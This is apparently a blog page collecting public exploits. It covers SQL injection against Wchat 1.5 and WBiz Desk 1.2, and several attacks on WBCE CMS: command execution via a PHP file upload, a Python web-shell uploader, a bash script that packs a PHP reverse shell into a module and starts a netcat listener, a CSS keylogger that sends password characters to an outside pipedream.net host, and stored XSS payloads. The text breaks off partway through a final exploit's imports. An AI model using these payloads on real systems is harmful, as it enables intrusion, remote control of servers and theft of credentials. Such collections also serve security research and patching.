# # # # #
# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5979
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/login.php
#
# User: ' UNION ALL SELECT 0x31,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0x34-- XXX
# Pass: anything
#
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153547
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech
[#] 3xploit:
[path]//ticket.php?tk=[SQL Injection]
[#] 3xample:
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.
# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution
# Date: 30/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
# Version: 1.6.1
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS
## POC:
1 ) Login with admin cred and click Add-ons
2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
4 ) You will be see id command result
Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)
### Post Request:
POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
Content-Length: 522
Origin: https://demos6.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="formtoken"
5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
Content-Type: application/x-php
<?php echo system('id'); ?>
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="submit"
-----------------------------86020911415982314764024459--
### Response :
<!-- ################### Up from here: Original Code from original template ########### -->
<!-- senseless positioning-table: needed for old modules which base on class td.content -->
<div class="row" style="overflow:visible">
<div class="fg12">
<table id="former_positioning_table">
<tr>
<td class="content">
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
<div class="top alertbox_error fg12 error-box">
<i class=" fa fa-2x fa-warning signal"></i>
<p>Invalid WBCE CMS language file. Please check the text file.</p>
<p><a href="index.php" class="button">Back
# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
# Date: 3/5/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wbce-cms.org/
# Software Link:
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS
import requests
from bs4 import BeautifulSoup
import sys
import time
def login(url, username, password):
print("Logging in...")
time.sleep(3)
with requests.Session() as session:
response = session.get(url + "/admin/login/index.php")
soup = BeautifulSoup(response.text, 'html.parser')
form = soup.find('form', attrs={'name': 'login'})
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
form.find_all('input') if input_tag.get('type') != 'submit'}
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
username
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
password
post_response = session.post(url + "/admin/login/index.php", data=form_data)
if "Administration" in post_response.text:
print("Login successful!")
time.sleep(3)
return session
else:
print("Login failed.")
print("Headers received:", post_response.headers)
print("Response content:", post_response.text[:500]) # İlk 500 karakter
return None
def upload_file(session, url):
# Dosya içeriğini ve adını belirleyin
print("Shell preparing...")
time.sleep(3)
files = {'upload[]': ('shell.inc',"""<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>""", 'application/octet-stream')}
data = {
'reqid': '18f3a5c13d42c5',
'cmd': 'upload',
'target': 'l1_Lw',
'mtime[]': '1714669495'
}
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
files=files, data=data)
if response.status_code == 200:
print("Your Shell is Ready: " + url + "/media/shell.inc")
else:
print("Failed to upload file.")
print(response.text)
if __name__ == "__main__":
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(url, username, password)
if session:
upload_file(session, url)
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
#!/bin/bash
# Make a zip file exploit
# Start netcat listener
if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi
if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1
fi
ip=$1
port=$2
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule
echo [*] Crafting Payload
cat <<EOF > shellModule/info.php
<?php
/**
*
* @category modules
* @package Reverse Shell
* @author Swammers8
* @link https://swammers8.github.io/
* @license http://www.gnu.org/licenses/gpl.html
* @platform example.com
* @requirements PHP 5.6 and higher
* @version 1.3.3.7
* @lastmodified May 22 2025
*
*
*/
\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';
\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if (\$pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}
\$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
printit("Successfully opened reverse shell to \$ip:\$port");
while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}
if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}
if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}
fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}
?>
EOF
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener
nc -lvnp $port
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)
'''
<html>
<head>
<title>
Login
</title>
<style>
input[type="password"][value*="q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{
background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{
background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{
background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{
background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{
background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{
background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{
background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{
background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{
background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{
background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{
background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{
background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{
background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{
background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{
background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{
background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{
background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{
background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{
background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{
background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{
background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{
background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{
background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{
background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{
background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{
background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{
background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{
background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{
background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{
background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{
background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{
background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{
background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{
background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{
background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{
background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{
background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{
background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{
background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{
background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{
background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{
background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{
background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{
background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{
background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{
background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{
background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{
background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{
background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{
background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{
background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{
background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{
background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{
background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{
background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{
background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{
background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{
background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''
4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.
7.We write to html files url
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8.And create csrf-poc with csrf.poc.generator
<html>
<title>
This CSRF was found by miri
</title>
<body>
<h1>
CSRF POC
</h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
Poc video : https://youtu.be/m-x_rYXTP9E
Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Version: 1.6.1
Bugs: XSS
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
steps:
1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: localhost
Content-Length: 976
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167
Connection: close
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="reqid"
187de34ea92ac
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="mtime[]"
1683056102
------WebKitFormBoundary5u4r3pOGl4EnuBtO--
3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)
========================================================================================================================
###XSS-2###
1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)
2. add page
3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)
payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E
poc request:
POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1
Host: localhost
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475
Connection: close
page_id=4§ion_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save
4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
# Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/01/2022
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: 1.5.2
# Tested on: Linux - PHP Version: 8.0.14
# Github repo: https://github.com/WBCE/WBCE_CMS
# -*- coding: utf-8 -*-
#/usr/bin/env python
import requests
import string
import base64
import argparse
import time
import io
from bs4 import BeautifulSoup #pip install beautifulsoup4
